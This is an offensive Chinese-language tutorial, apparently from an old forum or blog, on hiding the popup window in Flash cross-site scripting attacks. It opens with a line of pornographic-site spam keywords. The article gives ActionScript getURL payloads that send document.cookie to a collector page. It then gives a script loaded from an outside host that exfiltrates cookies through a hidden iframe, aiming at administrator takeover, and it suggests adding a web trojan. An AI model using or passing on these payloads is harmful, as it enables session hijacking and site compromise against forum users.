国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

有一些日子好像Flash跨站攻擊鬧的挺兇的，但在實(shí)施Flash跨站攻擊時(shí)的那個(gè)彈出的IE窗口很容易引起別人的懷疑，而使得Flash跨站攻擊失敗，這的確讓人多少有點(diǎn)頭疼，大家是不是也一直在尋找實(shí)施Flash跨站攻擊時(shí)不彈出IE窗口的方法來(lái)隱藏自己的攻擊行為呢？下面大家和我一起來(lái)解決這個(gè)不大不小的問(wèn)題，讓Flash跨站攻擊更完美吧！

     一般來(lái)說(shuō)大家在進(jìn)行Flash跨站攻擊時(shí)都是自己做一個(gè)Flash動(dòng)畫(huà)，并在第一幀中加入用于跳轉(zhuǎn)到其他URL的AtionScript腳本函數(shù)，如下：

       getURL("javascript:window.open('http://用于收集Cookie的網(wǎng)頁(yè)地址?'+document.cookie)","_self")

然后把這個(gè)Flash動(dòng)畫(huà)置于論壇中的簽名、貼子或短信消息中，用來(lái)獲得管理員或用戶(hù)的Cookie，從而得到管理權(quán)限，進(jìn)一步伺機(jī)控制整個(gè)站點(diǎn),最終達(dá)到自己的目的。我們可以看到在整個(gè)跨站攻擊中最重要的就是這個(gè)AtionScript腳本啦！也就是這個(gè)腳本中用到的代碼打開(kāi)了一個(gè)我們又愛(ài)又恨的窗口，所以我們也只能從改造這個(gè)腳本代碼來(lái)實(shí)現(xiàn)隱藏或者是去掉彈出的IE窗口，除此外別無(wú)它法！

     我們先分析一下上面的AtionScript腳本，它使用AtionScript腳本函數(shù)"getURL"跳轉(zhuǎn)到一個(gè)使用JavaScript協(xié)議的URL（JavaScript協(xié)議后面就是我們非常熟悉的JavaScript腳本代碼），在JavaScript中使用document.cookie的到Cookie，并把Cookie和一個(gè)用于收集Cookie的網(wǎng)頁(yè)地址連成一個(gè)http協(xié)議的URL地址，最后使用window.open打開(kāi)合成的URL地址，從而把Cookie用GET方式發(fā)送到用于收集Cookie的網(wǎng)頁(yè)，并記錄下來(lái)。

     通過(guò)上面的分析我們進(jìn)一步了解那個(gè)彈出的IE窗口是由于JavaScript協(xié)議中的代碼window.open所生成的，相信大家都知道window.open的第二個(gè)參數(shù)用來(lái)指定打開(kāi)的窗口的名字，其通用名稱(chēng)有"_media （IE6.0   在瀏覽器左邊的媒體面板內(nèi)打開(kāi)）"、"_blank （在新窗口中打開(kāi)）"、"_parent （在當(dāng)前框架的父框架內(nèi)打開(kāi)。假如當(dāng)前框架無(wú)父框架，此參數(shù)值等同于 _self）"、"_search （IE5.0   在瀏覽器左邊的搜索面板內(nèi)打開(kāi)）"、"_self（在當(dāng)前窗口中打開(kāi)，覆蓋當(dāng)前文檔）"、"_top （在所有框架之外的最頂層窗口中打開(kāi)。假如當(dāng)前窗口無(wú)框架結(jié)構(gòu)，此參數(shù)值等同于 _self ）"等幾種，如果我們以"_search"來(lái)打開(kāi)窗口，不是就沒(méi)有了彈出的IE窗口了嗎？AtionScript腳本改為：

       getURL("JavaScript:window.open('http://用于收集Cookie的網(wǎng)頁(yè)地址?'+document.cookie,'_search')","_self")

當(dāng)然，這樣做會(huì)打開(kāi)搜索面板，也會(huì)引起懷疑，但卻可以躲過(guò)那些關(guān)閉彈出窗口軟件的追殺！姑且也算一種方法吧！

     如果僅僅是上面所說(shuō)的，相信不少讀者要把我。。。。。。

     看到這里聰明的你是不是想到了點(diǎn)解決的思路？對(duì)！既然支持JavaScript啦，還有啥東東會(huì)不能解決呢？JavaScript真的是好處多多呀！

     如果你曾看了我的那篇"打造一個(gè)完美的ＩＥ網(wǎng)頁(yè)木馬"的文章，并且你對(duì)其中的代碼深深理解的話(huà)，你可以自己先去想象一下啦！呵呵......

     在那篇文章中有下面這樣一段代碼：

jsurl="

使用了javascript協(xié)議把自己網(wǎng)站上的一個(gè)js代碼文件插入到了本地文件中，同樣的道理我們也可以用它把一個(gè)js代碼文件插入到進(jìn)行跨站攻擊的論壇網(wǎng)頁(yè)中，相應(yīng)的AtionScript腳本改為：

       getURL("JavaScript:document.all.tags('SCRIPT')[0].src='
http:\/\/www.godog.y365.com\/wodemuma\/icyfox.js';eval();","_self")

其中icyfox.js得內(nèi)容如下：

cookieurl="http://用于收集Cookie的網(wǎng)頁(yè)地址?cookie="+escape(document.cookie);
/*這里使用了escape(）對(duì)cookie編碼，用來(lái)防止cookie中的一些特殊字符*/
document.body.insertAdjacentHtml('beforeEnd','<iframe WIDTH=0px HEIGHT=0px style="display:none;" src="'+cookieurl+'"><\/iframe>');
/*這里使用了insertAdjacentHTML在body的最后插入了一個(gè)不可見(jiàn)的框架*/
這里主要是利用了可以在一個(gè)網(wǎng)頁(yè)中引入不同域中的javascript代碼文檔，而且所引入的javascript代碼文檔會(huì)和本網(wǎng)頁(yè)融為一體的特點(diǎn)！

     好啦！至此Flash跨站攻擊彈出IE窗口的問(wèn)題算是解決啦！當(dāng)然如果你愿意，在icyfox.js中加個(gè)網(wǎng)頁(yè)木馬之類(lèi)的我也無(wú)話(huà)可說(shuō)!
     最后我再順便說(shuō)一句，它同樣可以用于在其他類(lèi)型的跨站腳本功擊中隱藏彈出的IE窗口！比起利用Microsoft.XMLHTTP控件發(fā)送COOKIE要隨意的多，因?yàn)樗粫?huì)像Microsoft.XMLHTTP控件那樣只能發(fā)給當(dāng)前服務(wù)器，還有焦點(diǎn)上czy的"利用Microsoft.XMLHTTP控件發(fā)送COOKIE"一文中提到這樣一句話(huà)：

"以前我想了一個(gè)在網(wǎng)頁(yè)中用insertAdjacentHTML方法來(lái)注入HTML語(yǔ)句的辦法勉強(qiáng)可以作到發(fā)送COOKIE不出現(xiàn)IE窗口，但是在實(shí)際使用中有時(shí)會(huì)遇到IE出錯(cuò)。"

具我分析是因?yàn)樵贑OOKIE中存在了一些特殊字符，而czy沒(méi)有正確處理或是編碼，才會(huì)在實(shí)際使用中有時(shí)會(huì)遇到IE出錯(cuò)，所以上面代碼我用了escape(）對(duì)cookie編碼，在接受到cookie后請(qǐng)注意用unescape(）來(lái)解碼！